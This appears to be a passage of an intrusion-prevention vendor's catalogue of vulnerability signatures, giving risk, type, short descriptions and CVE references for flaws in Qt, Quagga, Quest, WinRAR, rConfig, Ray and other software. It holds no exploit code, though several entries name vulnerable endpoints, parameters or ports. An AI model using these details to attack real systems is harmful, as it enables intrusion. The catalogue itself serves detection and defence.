Qt-BMP-Handling-Buffer-Overflow

About this vulnerability:

A vulnerability in Trolltech Qt Library

Risk:

Moderate

First detected in:

sgpkg-ips-789-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Trolltech Qt Library

Type:

Malfunction

Description:

There is a vulnerability in the way the Qt library handles BMP images. Due to boundary check errors during the handling 8-bit RLE encoded BMP files, a heap buffer overflow can occur when opening malformed BMP images. This vulnerability, when successfully exploited, can allow for the execution of arbitrary code on a vulnerable system within the security context of the application embedding the Qt library. The victim's application will crash as a result of a successful attack. In the case of a more sophisticated attack that attempts to take control of the process flow, the behavior of the target depends entirely on the injected code.

Situation:

File-Binary_Qt-BMP-Handling-Buffer-Overflow

References:

CVE-2004-0691
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0691

BID-10977
http://www.securityfocus.com/bid/10977

Quagga-Aspath_Put-BGP-Session-Drop-Denial-Of-Service

About this vulnerability:

A vulnerability in Quagga Quagga

Risk:

Moderate

First detected in:

sgpkg-ips-1038-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Quagga

Type:

Malfunction

Description:

Improper calculations based on client message data cause denial of service vulnerability in Quagga. A successful exploit allows an attacker to cause sessions to be dropped.

Situation:

Generic_CS-Quagga-Aspath_Put-BGP-Session-Drop-Denial-Of-Service

References:

CVE-2017-16227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16227

Quagga-BGP-Daemon-BGP_Capability_Msg_Parse-Denial-Of-Service

About this vulnerability:

A vulnerability in Quagga

Risk:

High

First detected in:

sgpkg-ips-1129-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Quagga

Type:

Infinite Loop

Description:

A denial-of-service vulnerability has been reported in the BGP Daemon of Quagga. The vulnerability is due to improper handling of Multiprotocol Extensions Capabilities within certain BGP messages. A remote attacker could exploit this vulnerability by sending a crafted BGP message to the target server. Successful exploitation could result in denial-of-service conditions.

Situation:

Generic_TCP-Quagga-BGP-Daemon-BGP_Capability_Msg_Parse-Denial-Of-Service

References:

CVE-2018-5381
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5381

Quagga-BGP-Daemon-Notify-Attribute-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Quagga Quagga

Risk:

High

First detected in:

sgpkg-ips-1129-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Quagga

Type:

Input Validation

Description:

An out of bounds read vulnerability has been reported in Quagga BGP Daemon. The vulnerability is due to improper validation of attribute sizes received by BGP peers before responding with the contents of the attribute in a NOTIFY message. A remote attacker can exploit this vulnerability by sending a crafted BGP UPDATE message to the target server. Successful exploitation could result in the disclosure of memory contents to the attacker. Unsuccessful exploitation could result in termination of the bgpd process.

Situation:

Generic_TCP-Quagga-BGP-Daemon-Notify-Attribute-Out-Of-Bounds-Read

References:

CVE-2018-5378
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5378

Quagga-Daemon-BGP_Update_Receive-Double-Free

About this vulnerability:

A vulnerability in Quagga Quagga

Risk:

Moderate

First detected in:

sgpkg-ips-1055-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Quagga

Type:

Input Validation

Description:

Improper handling of cluster list and unknown attributes causes a double free vulnerability in Quagga. A successful exploit may allow an attacker to run arbitrary code on the target system with the privileges of the daemon.

Situation:

Generic_CS-Quagga-Daemon-BGP_Update_Receive-Double-Free

References:

CVE-2018-5379
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5379

Quagga-Vty-Interface-Denial-Of-Service

About this vulnerability:

A vulnerability in Quagga

Risk:

Moderate

First detected in:

sgpkg-ips-863-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Quagga

Type:

Input Validation

Description:

The Vty interface in the Quagga daemon has an input validation vulnerability, which can be exploited by sending a long sequence of characters without a newline. A successful exploit can cause a denial of service condition.

Situation:

Generic_CS-Quagga-Vty-Interface-Denial-Of-Service

References:

CVE-2017-5495
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5495

Qualcomm-WorldMail-IMAP-Literal-Counter-Parsing-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the IMAP literal counter parsing in Qualcomm WorldMail

Risk:

High

First detected in:

sgpkg-ips-58-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Qualcomm WorldMail

Type:

Buffer Overflow

Description:

The Qualcomm WorldMail IMAP server has a buffer overflow vulnerability in the handling of IMAP literal octet counter. The server does not validate the length of the counter value, which is copied into a static size buffer. If the value is long enough, the copy operation will cause a buffer overflow condition. A remote attacker is able to exploit this vulnerability to execute arbitrary code on the vulnerable server.

Situation:

IMAP_CS-Qualcomm-WorldMail-IMAP-Literal-Counter-Parsing-Buffer-Overflow

References:

CVE-2005-4267
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4267

BID-15980
http://www.securityfocus.com/bid/15980

Qualcomm-WorldMail-IMAP-Server-Directory-Traversal

About this vulnerability:

A vulnerability in Qualcomm WorldMail

Risk:

High

First detected in:

sgpkg-ips-414-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Qualcomm WorldMail

Type:

Directory Traversal

Description:

There exists a directory traversal vulnerability in Qualcomm WorldMail IMAP server. The vulnerability is caused by insufficient validation of the user provided data. An authenticated remote attacker can exploit this vulnerability to gain access to other user's mailboxes as well as files and folders on the target system.

Situation:

IMAP_Qualcomm-WorldMail-IMAP-Server-Directory-Traversal

References:

CVE-2005-3189
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3189

BID-15488
http://www.securityfocus.com/bid/15488

Quest-Intrust-Annotation-Objects-ActiveX-Control-Index-Out-Of-Bounds

About this vulnerability:

A vulnerability in Quest Software InTrust

Risk:

Moderate

First detected in:

sgpkg-ips-503-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Quest Software InTrust

Type:

Malfunction

Description:

A memory access vulnerability has been reported in Quest InTrust's Annotation Objects ActiveX control. The vulnerability is due to a design flaw in the Add() method exposed by this ActiveX control, which allows script code to cause the process to execute code from an attacker-controlled memory location. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to access a maliciously crafted web page. This can result in code execution in the context of the affected user.

Situation:

File-Text_Quest-Intrust-Annotation-Objects-ActiveX-Control-Index-Out-Of-Bounds

References:

CVE-2012-5896
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5896

BID-52765
http://www.securityfocus.com/bid/52765

OSVDB-80662
http://www.osvdb.org/80662

Quest-Kace-Systems-Management-Command-Injection

About this vulnerability:

A vulnerability in Quest KACE Systems Management

Risk:

High

First detected in:

sgpkg-ips-1111-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Quest Software KACE Systems Management

Type:

Input Validation

Description:

A vulnerability in Quest KACE Systems Management, version 8.0.318, which allows remote attackers to execute arbitrary commands through the download_agent_installer.php script by appending commands to the # symbol.

Situation:

HTTP_CSU-Quest-Kace-Systems-Management-Command-Injection

References:

CVE-2018-11138
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11138

Quest-Kace-Systems-Management-Run_Cross_Report-SQL-Injection

About this vulnerability:	A vulnerability in Quest Software KACE Systems Management
Risk:	Moderate
First detected in:	sgpkg-ips-1110-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Quest Software KACE Systems Management
Type:	Input Validation
Description:	There has been reported a SQL injection vulnerability in Quest KACE Systems Management. A remote attacker could exploit this vulnerability by a sending crafted request to the target server. Successful exploitation leads in information disclosure.
Situation:	HTTP_CRL-Quest-Kace-Systems-Management-Run_Cross_Report-SQL-Injection

Quest-Kace-Systems-Management-Run_Report-Command-Injection

About this vulnerability:	A vulnerability in Quest Software KACE Systems Management
Risk:	Moderate
First detected in:	sgpkg-ips-1106-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Quest Software KACE Systems Management
Type:	Input Validation
Description:	Improper handling of parameters submitted in requests to the run_report page causes a command injection vulnerability in Quest Software KACE System Management. A successful exploit may allow an attacker to run arbitrary commands with root privileges.
Situation:	HTTP_CS-Quest-Kace-Systems-Management-Run_Report-Command-Injection

Quest-NetVault-Backup-Export-Arbitrary-File-Overwrite

About this vulnerability:

A vulnerability in Quest Software NetVault Backup

Risk:

Moderate

First detected in:

sgpkg-ips-1038-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Quest Software NetVault Backup

Type:

Input Validation

Description:

Insufficient validation of request data causes a file overwrite vulnerability in Quest NetVault. A successful attack may overwrite any file on the target system.

Situation:

File-Text_Quest-NetVault-Backup-Export-Arbitrary-File-Overwrite

References:

CVE-2018-1162
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1162

Quest-NetVault-Backup-Multipart-Request-Checksession-Authentication-Bypass

About this vulnerability:

A vulnerability in Quest Software NetVault Backup

Risk:

Moderate

First detected in:

sgpkg-ips-1038-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Quest Software NetVault Backup

Type:

Malfunction

Description:

There has been reported a vulnerability in the web interface component of Quest NetVault Backup. The value of "checksession" parameter isn't properly handled. This vulnerability can be exploited remotely by sending a maliciously crafted request to the target server. Exploiting this vulnerability might lead to execution of arbitrary code in the target system.

Situation:

HTTP_CS-Quest-NetVault-Backup-Multipart-Request-Checksession-Authentication-Bypass

References:

CVE-2018-1163
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1163

Quest-NetVault-Backup-Multipart-Request-Part-Header-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Quest Software NetVault Backup

Risk:

Moderate

First detected in:

sgpkg-ips-1038-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Quest Software NetVault Backup

Type:

Buffer Overflow

Description:

Improper handling of HTTP multipart requests causes a stack buffer overflow vulnerability in Quest NetVault Backup. A successful exploit may allow an attacker to execute arbitrary code with system privileges without authentication.

Situation:

HTTP_CS-Quest-NetVault-Backup-Multipart-Request-Part-Header-Stack-Buffer-Overflow

References:

CVE-2018-1161
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1161

Quest-NetVault-Smartdisk-Libnvbasics.dll-Denial-Of-Service

About this vulnerability:	A vulnerability in Quest Software NetVault SmartDisk
Risk:	Moderate
First detected in:	sgpkg-ips-432-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Quest Software NetVault SmartDisk
Type:	Malfunction
Description:	A denial of service vulnerability has been reported in Quest's (formerly BakBone) NetVault SmartDisk backup application. Specifically, an input validation error exists in libnvbasics.dll, which is used by the percolatorslave.exe service listening on TCP port 37452. A remote unauthenticated attacker can exploit this vulnerability to cause a denial of service condition.
Situation:	Generic_Quest-NetVault-Smartdisk-Libnvbasics.dll-Denial-Of-Service

Quest-Privilege-Manager-pmmasterd-Buffer-Overflow

About this vulnerability:

A Quest Privilege Manager pmmasterd Buffer Overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-1014-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

Quest Privilege Manager

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Quest Privilege Manager, versions prior to 6.0.0-50, which allows remote attackers to gain full access to the target server via an ACT_ALERT_EVENT request that causes memory corruption in the pmmasterd daemon.

Situation:

Generic_CS-Quest-Privilege-Manager-pmmasterd-Buffer-Overflow

References:

CVE-2017-6553
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6553

Quic-go-Crypto-Ack-Nil-Pointer-Dereference

About this vulnerability:

A vulnerability in quic-go

Risk:

Moderate

First detected in:

sgpkg-ips-1681-5242

Last changed:

sgpkg-ips-1681-5242

Platform:

Generic

Software:

quic-go

Type:

Malfunction

Description:

A denial of service vulnerability has been reported for quic-go. The vulnerability is due to a nil pointer dereference. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted packet to the target during the QUIC handshake. Successful exploitation could result in denial of service conditions on the target server.

Situation:

Generic_UDP-Quic-go-Crypto-Ack-Nil-Pointer-Dereference

References:

CVE-2023-46239
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46239

QuickTime-Darwin-Streaming-Server-Buffer-Overflow

About this vulnerability:

A vulnerability in Quicktime and Darwin Streaming Server

Risk:

High

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

QuickTime Streaming Server; Darwin Streaming Server

Type:

Buffer Overflow

Description:

A vulnerability exists in the QuickTime Streaming Server and Darwin Streaming Server that allows remote users to cause a denial of service condition on the server. The vulnerability can be exploited to cause the service to either crash or consume all available processor resources.

Situation:

Generic_CS-QuickTime-Darwin-Streaming-Server-Buffer-Overflow

References:

CVE-2004-0169
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0169

BID-9735
http://www.securityfocus.com/bid/9735

OSVDB-6837
http://www.osvdb.org/6837

OSVDB-6826
http://www.osvdb.org/6826

Quikstore-Shopping-Cart-Disclose-Info

About this vulnerability:

QuikStore shopping cart (quikstore.cfg) private information disclosure

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

Quikstore Quikstore

Type:

Insecure Configuration

Description:

An incorrect configuration of the QuikStore shopping cart program 'quikstore.cfg' could disclose private information.

References:

CVE-1999-0607
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0607

BID-1983
http://www.securityfocus.com/bid/1983

Raccoon-Stealer-Infection-Traffic

About this vulnerability:	Raccoon stealer infection traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1353-5242
Last changed:	sgpkg-ips-1353-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Raccoon stealer infection traffic was detected.
Situation:	HTTP_CRL-Raccoon-Stealer-Infection-Traffic

Racer-Buffer-Overflow

About this vulnerability:

A Racer Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-731-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP

Software:

Racer

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Racer, versions 0.5.3 beta 5, which allows remote attackers to execute arbitrary code via a long string to UDP port 26000.

Situation:

Generic_UDP-Racer-Buffer-Overflow

References:

CVE-2007-4370
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4370

BID-25297
http://www.securityfocus.com/bid/25297

OSVDB-39601
http://www.osvdb.org/39601

Ralio-Remote-File-Include-Input-Validation

About this vulnerability:

A Ralio Remote File Include Input Validation vulnerability.

Risk:

High

First detected in:

sgpkg-ips-696-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Ralio

Type:

Insecure Configuration

Description:

Ralio 4.2.1, and possibly other versions, have a file-include vulnerability which allows remote attackers to execute arbitrary code due to insufficient user input sanitization.

Situation:

HTTP_CRL-Ralio-Remote-File-Include-Input-Validation

References:

CVE-2014-5468
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5468

BID-69761
http://www.securityfocus.com/bid/69761

Rancher-Server-Docker-Exploit

About this vulnerability:	A Rancher Server Docker Exploit vulnerability
Risk:	High
First detected in:	sgpkg-ips-1023-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Linux
Software:	Rancher Server
Type:	Insecure Configuration
Description:	A vulnerability in Rancher Server which allows remote attackers to create a docker container with the '/' path mounted with read/write permissions on the host server that is running the docker container, allowing the attacker to edit/create files owed by root.
Situation:	HTTP_CRL-Rancher-Server-Docker-Exploit

Rank-Math-Wordpress-SEO-Plugin-Updatemeta-Rest-Endpoint-Access-Control-Weakness

About this vulnerability:	A vulnerability in Rank Math Wordpress SEO Plugin
Risk:	Moderate
First detected in:	sgpkg-ips-1240-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	WordPress
Type:	Malfunction
Description:	The lack of authorization verification on the updateMeta REST endpoint of the SEO Plugin by Rank Math causes an access control weakness vulnerability in Wordpress instances that use it. A successful exploit allows an attacker to modify user metadata and possibly gain access for further exploitation.
Situation:	HTTP_CS-Rank-Math-Wordpress-SEO-Plugin-Updatemeta-Rest-Endpoint-Access-Control-Weakness

RapidShare-File-Sharing-Service

About this vulnerability:	RapidShare-File-Sharing-Service
Risk:	Low
First detected in:	sgpkg-ips-211-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Rapidshare
Type:	Browser
Description:	Rapidshare is an online file sharing service.
Situation:	HTTP_CSH-RapidShare-Access

Raptor-Train-Malware-Activity

About this vulnerability:	An attempt to exploit a vulnerability in Raptor Train detected
Risk:	High
First detected in:	sgpkg-ips-1780-5242
Last changed:	sgpkg-ips-1780-5242
Platform:	Generic
Software:	Raptor Train Malware
Type:	Backdoor
Description:	Raptor Train is a botnet that has infected thousands of networking devices (routers and modems, NVRs and DVRs, IP cameras, and network-attached storage servers) in the U.S. and other countries. This fingerprint detects the malware's activities.
Situation:	HTTP_CSU-Raptor-Train-Malware-Activity

RARLAB-UnRAR-Extractunixlink50-Directory-Traversal

About this vulnerability:

A vulnerability in RARLAB UnRAR

Risk:

Moderate

First detected in:

sgpkg-ips-1484-5242

Last changed:

sgpkg-ips-1484-5242

Platform:

Generic

Software:

UnRAR

Type:

Directory Traversal

Description:

A directory traversal vulnerability exists in UnRAR. The vulnerability is due to improper handling of relative file paths when extracting RAR archives containing symbolic links. A remote attacker could exploit this vulnerability by enticing a target user to extract a maliciously crafted RAR file. Successful exploitation will lead to a file being created outside of the expected location, in the worst case leading to arbitrary code execution.

Situation:

File-Binary_RARLAB-UnRAR-Extractunixlink50-Directory-Traversal

References:

CVE-2022-30333
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30333

RARLAB-WinRAR-ACE-Directory-Traversal

About this vulnerability:

A vulnerability in RARLAB WinRAR

Risk:

Moderate

First detected in:

sgpkg-ips-1141-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

RARLAB WinRAR

Type:

Malfunction

Description:

Improper validation of a filename in an ACE archive file causes a directory traversal vulnerability in WinRAR. A successful exploit may allow an attacker to crate arbitrary directories on the target system.

Situation:

File-Binary_RARLAB-WinRAR-ACE-Directory-Traversal

References:

CVE-2018-20251
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20251

RARLAB-WinRAR-ACE-Remote-Code-Execution

About this vulnerability:

A vulnerability in RARLAB WinRAR

Risk:

Moderate

First detected in:

sgpkg-ips-1137-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

RARLAB WinRAR

Type:

Directory Traversal

Description:

A remote code execution vulnerability has been reported in the RARLAB WinRAR. The vulnerability is due to improper handling of the relative path of a file in an ACE archive, which leads to directory traversal. A remote attacker could exploit this vulnerability by enticing a target user to open a maliciously crafted ACE file. Successful exploitation of the vulnerability could lead to execution of arbitrary code in the security context of the user.

Situation:

File-Binary_RARLAB-WinRAR-ACE-Remote-Code-Execution

References:

CVE-2018-20250
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20250

RARLAB-WinRAR-File-Extension-Spoofing-Vulnerability

About this vulnerability:

A vulnerability in RARLAB WinRAR

Risk:

High

First detected in:

sgpkg-ips-1634-5242

Last changed:

sgpkg-ips-1634-5242

Platform:

Generic

Software:

RARLAB WinRAR

Type:

Malfunction

Description:

A file extension spoofing vulnerability has been reported in RARLAB WinRAR. This vulnerability is due to a design weakness when handling data compressed in ZIP files. A remote attacker could exploit this vulnerability by enticing a victim to open a crafted file. Successfully exploiting this vulnerability could result in remote code execution.

Situation:

File-Member-Name_RARLAB-WinRAR-File-Extension-Spoofing-Vulnerability

References:

CVE-2023-38831
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38831

RARLAB-WinRAR-Recovery-Volume-Out-Of-Bounds-Write

About this vulnerability:

A vulnerability in RARLAB WinRAR

Risk:

High

First detected in:

sgpkg-ips-1644-5242

Last changed:

sgpkg-ips-1644-5242

Platform:

Generic

Software:

RARLAB WinRAR

Type:

Malfunction

Description:

A remote code execution vulnerability has been reported in RARLAB WinRAR. This vulnerability is due to an out-of-bounds write when handling recovery volumes. A remote attacker could exploit this vulnerability by enticing a victim to open a crafted file. Successfully exploiting this vulnerability could result in remote code execution.

Situation:

File-Binary_RARLAB-WinRAR-Recovery-Volume-Out-Of-Bounds-Write

References:

CVE-2023-40477
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40477

RARLAB-WinRAR-Zip-File-Out-of-Bounds-Read

About this vulnerability:

A vulnerability in RARLAB WinRAR

Risk:

Moderate

First detected in:

sgpkg-ips-1608-5242

Last changed:

sgpkg-ips-1608-5242

Platform:

Generic

Software:

RARLAB WinRAR

Type:

Malfunction

Description:

A out-of-bounds read vulnerability has been reported in the RARLAB WinRAR. The vulnerability is due to improper handling of ZIP files. A remote attacker could exploit this vulnerability by enticing a target user to open a maliciously crafted ZIP file. Successful exploitation of the vulnerability could lead to information disclosure in the security context of the user.

Situation:

File-Zip_RARLAB-WinRAR-Zip-File-Out-of-Bounds-Read

References:

CVE-2022-43650
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43650

RaspAP-Unauthenticated-Command-Injection

About this vulnerability:

An attempt to exploit a vulnerability in RaspAP detected

Risk:

High

First detected in:

sgpkg-ips-1669-5242

Last changed:

sgpkg-ips-1669-5242

Platform:

Unix;Linux

Software:

RaspAP

Type:

Input Validation

Description:

A vulnerability in RaspAP wireless router software, versions 2.8.0 through 2.8.7, which allows remote attackers to execute arbitrary code through the cfg_id parameter in a request to /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.

Situation:

HTTP_CRL-RaspAP-Unauthenticated-Command-Injection

References:

CVE-2022-39986
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-39986

RaspberryMatic-Unauthenticated-RCE-Vulnerability-Through-HMServer-File-Upload

About this vulnerability:

A vulnerability in RaspberryMatic

Risk:

High

First detected in:

sgpkg-ips-1844-5242

Last changed:

sgpkg-ips-1844-5242

Platform:

Unix; Linux

Software:

RaspberryMatic

Type:

Directory Traversal

Description:

A vulnerability in RaspberryMatic which allows remote attackers to upload malicious .tgz firmware files, via /pages/jpages/system/DeviceFirmware/addFirmware, to a directory location outside of the predefined temp directory by way of directory traversal.

Situation:

HTTP_CS-RaspberryMatic-Unauthenticated-RCE-Vulnerability-Through-HMServer-File-Upload

References:

CVE-2024-24578
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24578

Ray-Agent-Job-RCE-CVE-2023-48022

About this vulnerability:

A vulnerability in Ray Agent

Risk:

Moderate

First detected in:

sgpkg-ips-1771-5242

Last changed:

sgpkg-ips-1771-5242

Platform:

Generic

Software:

Ray Agent

Type:

Input Validation

Description:

Insufficient input validation in the agent job submission endpoint causes a remote code execution in Ray. A successful exploitation allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Ray-Agent-Job-RCE-CVE-2023-48022

References:

CVE-2023-48022
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48022

Ray-OS-Command-Injection-Via-Format-Parameter-CVE-2023-6019

About this vulnerability:

An attempt to exploit a vulnerability in Ray OS detected

Risk:

High

First detected in:

sgpkg-ips-1711-5242

Last changed:

sgpkg-ips-1711-5242

Platform:

Generic

Software:

Ray OS

Type:

Input Validation

Description:

A command injection exists in Ray's cpu_profile URL parameter allowing attackers to execute os commands on the system running the ray dashboard remotely without authentication.

Situation:

HTTP_CSU-Ray-OS-Command-Injection-Via-Format-Parameter-CVE-2023-6019

References:

CVE-2023-6019
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6019

rConfig-Ajaxarchivefiles.php-Command-Injection

About this vulnerability:

A vulnerability in rConfig Network Device Configuration Tool

Risk:

Moderate

First detected in:

sgpkg-ips-1217-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

rConfig

Type:

Input Validation

Description:

There has been reported a post-auth command injection vulnerability in rConfig Network Device Configuration Tool. Successful exploitation could result in arbitrary command execution.

Situation:

HTTP_CRL-rConfig-Ajaxarchivefiles.php-Command-Injection

References:

CVE-2019-19509
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19509

rConfig-Ajaxserversettingschk.php-Command-Injection

About this vulnerability:

A vulnerability in rConfig Network Device Configuration Tool

Risk:

High

First detected in:

sgpkg-ips-1206-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

rConfig

Type:

Input Validation

Description:

A command injection vulnerability has been reported in rConfig Network Device Configuration Tool. The vulnerability is due to insufficient input validation in the ajaxServerSettingsChk.php. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in arbitrary command execution with the web server privilege on the target system.

Situation:

HTTP_CRL-rConfig-Ajaxserversettingschk.php-Command-Injection

References:

CVE-2019-16662
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16662

rConfig-Commands.inc.php-SQL-Injection

About this vulnerability:

A vulnerability in rConfig Network Device Configuration Tool

Risk:

High

First detected in:

sgpkg-ips-1237-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

rConfig

Type:

SQL Injection

Description:

There exists a vulnerability in rConfig Network Device Configuration Tool, versions 3.9.4 and before, which allows remote attackers to execute arbitrary SQL commands by sending a crafted request, due to the insufficient input validation in the commands.inc.php.

Situation:

HTTP_CRL-rConfig-Commands.inc.php-SQL-Injection

References:

CVE-2020-10220
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10220

rConfig-Compliancepolicies.PHP-SQL-Injection

About this vulnerability:

A vulnerability in rConfig Network Device Configuration Tool

Risk:

Moderate

First detected in:

sgpkg-ips-1260-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

rConfig

Type:

Input Validation

Description:

Improper handling of request parameters in compliancepolicies.inc.php causes an SQL injection vulnerability in rConfig. A successful exploit allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-rConfig-Compliancepolicies-Snippets.PHP-SQL-Injection

References:

CVE-2020-10546
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10546

rConfig-Compliancepolicies_PHP-SQL-Injection

About this vulnerability:

A vulnerability in rConfig Network Device Configuration Tool

Risk:

Moderate

First detected in:

sgpkg-ips-1260-5242

Last changed:

sgpkg-ips-1429-5242

Platform:

Generic

Software:

rConfig

Type:

Input Validation

Description:

Improper validation of request parameters causes an SQL injection vulnerability in rConfig. A successful exploit allows an attacker to execute arbitrary SQL on the target database.

References:

CVE-2020-10546
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10546

rConfig-Devices.inc.php-SQL-Injection

About this vulnerability:

A vulnerability in rConfig Network Device Configuration Tool

Risk:

Moderate

First detected in:

sgpkg-ips-1209-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

rConfig

Type:

Input Validation

Description:

A SQL injection vulnerability has been reported in rConfig Network Device Configuration Tool. The vulnerability is due to insufficient input validation in the devices.inc.php. A remote, authenticated attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in the execution of arbitrary SQL commands against the database on the target server.

Situation:

HTTP_CRL-rConfig-Devices.inc.php-SQL-Injection

References:

CVE-2019-19207
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19207

rConfig-Install-Command-Execution

About this vulnerability:

A vulnerability in rConfig

Risk:

High

First detected in:

sgpkg-ips-1203-5242

Last changed:

sgpkg-ips-1731-5242

Platform:

Linux; Unix

Software:

rConfig

Type:

Input Validation

Description:

A vulnerability in rConfig, versions 3.9.2 and before, which allows remote attackers to execute arbitrary code via ajaxServerSettingsChk.php in the install directory, due to insufficient validation of user input.

Situation:

HTTP_CRL-rConfig-Ajaxserversettingschk.php-Command-Injection

References:

CVE-2019-16662
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16662

rConfig-Network-Device-Configuration-Ajaxcomparegetcmddates-SQL-Injection

About this vulnerability:

A vulnerability in rConfig Network Device Configuration Tool

Risk:

Moderate

First detected in:

sgpkg-ips-1580-5242

Last changed:

sgpkg-ips-1580-5242

Platform:

Generic

Software:

rConfig

Type:

Input Validation

Description:

Insufficient input validation in ajaxCompareGetCmdDates.php causes an SQL injection vulnerability in the rConfig network configuration tool. A successful exploit allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-rConfig-Network-Device-Configuration-Ajaxcomparegetcmddates-SQL-Injection

References:

CVE-2022-45030
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45030

rConfig-Network-Device-Configuration-Tool-Ajaxaddtemplate.php-Command-Injection

About this vulnerability:

A vulnerability in rConfig Network Device Configuration Tool

Risk:

Moderate

First detected in:

sgpkg-ips-1237-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

rConfig

Type:

Input Validation

Description:

There has been reported a command injection vulnerability in rConfig Network Device Configuration Tool. Successful exploitation could lead in arbitrary command execution.

Situation:

HTTP_CRL-rConfig-Network-Device-Configuration-Tool-Ajaxaddtemplate.php-Command-Injection

References:

CVE-2020-10221
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10221

rConfig-Network-Device-Configuration-Tool-Configdevice.php-Cross-Site-Scripting

About this vulnerability:

A vulnerability in rConfig Network Device Configuration Tool

Risk:

Moderate

First detected in:

sgpkg-ips-1275-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

rConfig

Type:

